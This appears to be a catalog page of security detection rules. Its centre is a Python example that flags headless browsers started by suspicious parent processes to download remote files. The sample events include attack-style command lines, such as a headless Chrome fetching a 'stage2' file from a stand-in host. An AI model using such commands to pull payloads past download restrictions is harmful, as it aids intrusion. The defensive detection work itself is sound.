Identifies read access to a high number of Active Directory object attributes. Knowledge of object properties can help adversaries find vulnerabilities, elevate privileges, or collect sensitive information.
Potential File Download via a Headless Browser
Sep 15, 2025 · Domain: Endpoint · OS: Windows · Use Case: Threat Detection · Tactic: Command and Control · Resources: Investigation Guide · Data Sources: Windows, Elastic Endgame, Elastic Defend, Windows Security Event Logs, Microsoft Defender for Endpoint, SentinelOne, Sysmon, Crowdstrike · Identifies the use of a browser to download a file from a remote URL when the browser is launched by a suspicious parent process. Adversaries may use browsers to avoid ingress tool transfer restrictions.
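As an added illustration of the detection idea in the summary above (constructed example code, not the Elastic rule's own query), the following runs the logic over a few constructed process-creation events: a known browser image, started with a headless or page-dump switch, given a remote URL, by a parent that normally has no reason to spawn a browser. The browser list, the parent list and the sample command lines are assumptions for the example and should be tuned to the environment.

```python
# Added example (not Elastic's rule logic): detect a headless browser launched by a
# suspicious parent to fetch a remote URL, over constructed process-creation events.
import re
from dataclasses import dataclass

# Chromium/Edge/Brave and Firefox switches that drive the browser without a window.
HEADLESS_PREFIXES = ("--headless", "--dump-dom", "--screenshot", "--print-to-pdf", "-headless")
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "chromium.exe", "firefox.exe"}
# Parents that normally have no reason to spawn a browser toward a remote URL
# (an assumption for this example; tune to the environment).
SUSPICIOUS_PARENTS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "msbuild.exe",
    "winword.exe", "excel.exe", "powerpnt.exe",
}
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
TOKEN = re.compile(r'"[^"]*"|\S+')


@dataclass
class ProcessEvent:
    process_name: str   # image name of the created process
    parent_name: str    # image name of its parent
    command_line: str   # full command line as logged (Sysmon event 1 / Security 4688)


def split_args(command_line):
    """Tokenise a Windows command line, dropping surrounding quotes."""
    return [t.strip('"') for t in TOKEN.findall(command_line)]


def is_headless_browser_download(ev):
    """True when a browser is started headless, given a remote URL, by a suspicious parent."""
    if ev.process_name.lower() not in BROWSERS:
        return False
    if ev.parent_name.lower() not in SUSPICIOUS_PARENTS:
        return False
    args = split_args(ev.command_line)[1:]          # drop the executable path
    headless = any(a.lower().startswith(HEADLESS_PREFIXES) for a in args)
    remote = any(REMOTE_URL.match(a) for a in args)
    return headless and remote


def detect(events):
    """Return the matching events so an analyst can pivot on parent and URL."""
    return [ev for ev in events if is_headless_browser_download(ev)]


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    ProcessEvent("chrome.exe", "cmd.exe",
                 r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --dump-dom https://files.example/stage2.txt'),
    ProcessEvent("chrome.exe", "explorer.exe",
                 r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://intranet.example/'),
    ProcessEvent("msedge.exe", "powershell.exe",
                 r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --screenshot http://203.0.113.7/p.png'),
    ProcessEvent("chrome.exe", "cmd.exe",
                 r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless about:blank'),
    ProcessEvent("firefox.exe", "explorer.exe",
                 r'"C:\Program Files\Mozilla Firefox\firefox.exe" -headless https://files.example/stage2.txt'),
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"ALERT parent={hit.parent_name} cmd={hit.command_line}")
```

Only the first and third sample events match: the second and fifth come from explorer.exe, and the fourth has no remote URL. The parent-process condition is what keeps this quiet on developer and CI hosts where headless browsers are routine; a script can also omit the headless switch entirely, so in production pair this with file-creation telemetry from the browser process and follow the rule's investigation guide rather than alerting on the command line alone.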
This rule is triggered when CVEs collected through the Rapid7 Threat Command integration match vulnerabilities found in the customer environment.